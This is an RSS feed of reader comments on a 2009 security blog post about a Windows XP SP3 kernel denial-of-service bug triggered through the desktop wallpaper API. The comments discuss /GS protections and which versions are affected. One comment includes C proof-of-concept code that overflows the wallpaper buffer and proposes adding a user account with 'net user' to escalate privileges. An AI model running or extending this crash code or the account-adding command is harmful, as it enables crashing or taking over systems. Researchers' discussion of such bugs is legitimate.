<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Oh No, My XPSP3</title>
	<atom:link href="http://www.ragestorm.net/blogs/?feed=rss2&#038;p=78" rel="self" type="application/rss+xml" />
	<link>http://www.ragestorm.net/blogs/?p=78</link>
	<description>An Arkon Blog</description>
	<lastBuildDate>Mon, 16 Aug 2010 18:49:15 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Insanely Low-Level &#187; Blog Archive &#187; Cleaning Resources Automatically</title>
		<link>http://www.ragestorm.net/blogs/?p=78&#038;cpage=1#comment-2274</link>
		<dc:creator>Insanely Low-Level &#187; Blog Archive &#187; Cleaning Resources Automatically</dc:creator>
		<pubDate>Tue, 15 Sep 2009 03:20:15 +0000</pubDate>
		<guid isPermaLink="false">http://www.ragestorm.net/blogs/?p=78#comment-2274</guid>
		<description>[...] even learned that my post about the kernel DoS in XPSP3 about the desktop wallpaper weakness became a CVE. It seems MS has [...]</description>
		<content:encoded><![CDATA[<p>[...] even learned that my post about the kernel DoS in XPSP3 about the desktop wallpaper weakness became a CVE. It seems MS has [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: hacker_bug</title>
		<link>http://www.ragestorm.net/blogs/?p=78&#038;cpage=1#comment-2259</link>
		<dc:creator>hacker_bug</dc:creator>
		<pubDate>Tue, 30 Jun 2009 09:35:48 +0000</pubDate>
		<guid isPermaLink="false">http://www.ragestorm.net/blogs/?p=78#comment-2259</guid>
		<description>#include &lt;windows.h&gt;
int main()
{
 const int SPI_GETDESKWALLPAPER = 115;
 WCHAR c[1000] = {0};
 memset(c, ‘c’, 1000);
 SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);

 WCHAR b[1000] = {0};
 SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
 return 0;
}

I don&#039;t know how to add this sentence exploit it to Elevation of Privilege
system(&quot;net user 1 /add&quot;);</description>
		<content:encoded><![CDATA[<p>#include &lt;windows.h&gt;<br />
int main()<br />
{<br />
 const int SPI_GETDESKWALLPAPER = 115;<br />
 WCHAR c[1000] = {0};<br />
 memset(c, ‘c’, 1000);<br />
 SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);</p>
<p> WCHAR b[1000] = {0};<br />
 SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);<br />
 return 0;<br />
}</p>
<p>I don&#8217;t know how to add this sentence exploit it to Elevation of Privilege<br />
system(&#8220;net user 1 /add&#8221;);</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: arkon</title>
		<link>http://www.ragestorm.net/blogs/?p=78&#038;cpage=1#comment-2222</link>
		<dc:creator>arkon</dc:creator>
		<pubDate>Mon, 02 Feb 2009 17:39:17 +0000</pubDate>
		<guid isPermaLink="false">http://www.ragestorm.net/blogs/?p=78#comment-2222</guid>
		<description>Code regression? Or maybe some changes in the profile/registry stuff.</description>
		<content:encoded><![CDATA[<p>Code regression? Or maybe some changes in the profile/registry stuff.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Peter Ferrie</title>
		<link>http://www.ragestorm.net/blogs/?p=78&#038;cpage=1#comment-2221</link>
		<dc:creator>Peter Ferrie</dc:creator>
		<pubDate>Mon, 02 Feb 2009 17:16:42 +0000</pubDate>
		<guid isPermaLink="false">http://www.ragestorm.net/blogs/?p=78#comment-2221</guid>
		<description>Windows 2000 is not vulnerable.  It fails the first call quietly, the second call succeeds, and the system keeps running normally.</description>
		<content:encoded><![CDATA[<p>Windows 2000 is not vulnerable.  It fails the first call quietly, the second call succeeds, and the system keeps running normally.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: mxatone</title>
		<link>http://www.ragestorm.net/blogs/?p=78&#038;cpage=1#comment-2220</link>
		<dc:creator>mxatone</dc:creator>
		<pubDate>Mon, 02 Feb 2009 15:23:31 +0000</pubDate>
		<guid isPermaLink="false">http://www.ragestorm.net/blogs/?p=78#comment-2220</guid>
		<description>Well yeah, just that on some citrix (or alike) configurations I doubt you can change the wallpaper but I&#039;m not an expert on that field :).

I didn&#039;t look in W2K, there is a good chance that /GS cookie could be easier to defeat or not existing at all (it may depend of the service pack too).</description>
		<content:encoded><![CDATA[<p>Well yeah, just that on some citrix (or alike) configurations I doubt you can change the wallpaper but I&#8217;m not an expert on that field <img src='http://www.ragestorm.net/blogs/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .</p>
<p>I didn&#8217;t look in W2K, there is a good chance that /GS cookie could be easier to defeat or not existing at all (it may depend of the service pack too).</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: arkon</title>
		<link>http://www.ragestorm.net/blogs/?p=78&#038;cpage=1#comment-2219</link>
		<dc:creator>arkon</dc:creator>
		<pubDate>Mon, 02 Feb 2009 14:38:15 +0000</pubDate>
		<guid isPermaLink="false">http://www.ragestorm.net/blogs/?p=78#comment-2219</guid>
		<description>That&#039;s the reason I didn&#039;t mind giving it here. If someone manages to exploit it, way to go, I didn&#039;t even try though. I have more pressing matters on my mind :)

It works on Guest User, what can you ask more? Besides maybe on WY2k, you don&#039;t have the /GS...</description>
		<content:encoded><![CDATA[<p>That&#8217;s the reason I didn&#8217;t mind giving it here. If someone manages to exploit it, way to go, I didn&#8217;t even try though. I have more pressing matters on my mind <img src='http://www.ragestorm.net/blogs/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>It works on Guest User, what can you ask more? Besides maybe on WY2k, you don&#8217;t have the /GS&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: mxatone</title>
		<link>http://www.ragestorm.net/blogs/?p=78&#038;cpage=1#comment-2218</link>
		<dc:creator>mxatone</dc:creator>
		<pubDate>Mon, 02 Feb 2009 13:48:42 +0000</pubDate>
		<guid isPermaLink="false">http://www.ragestorm.net/blogs/?p=78#comment-2218</guid>
		<description>Hi,

I already looked at it some months ago and didn&#039;t find a way to exploit this vulnerability properly. As far as I remember, there is not exception handler during this overflow and the /GS flag should be guessed in order to make it properly. It is quite uneasy to do but with some memory leaking vuln, it could be done (maybe). You may already notice that you need the SETDESKWALLPAPER right to do it properly too (even if almost anyone got it).

Have fun !</description>
		<content:encoded><![CDATA[<p>Hi,</p>
<p>I already looked at it some months ago and didn&#8217;t find a way to exploit this vulnerability properly. As far as I remember, there is not exception handler during this overflow and the /GS flag should be guessed in order to make it properly. It is quite uneasy to do but with some memory leaking vuln, it could be done (maybe). You may already notice that you need the SETDESKWALLPAPER right to do it properly too (even if almost anyone got it).</p>
<p>Have fun !</p>
]]></content:encoded>
	</item>
</channel>
</rss>
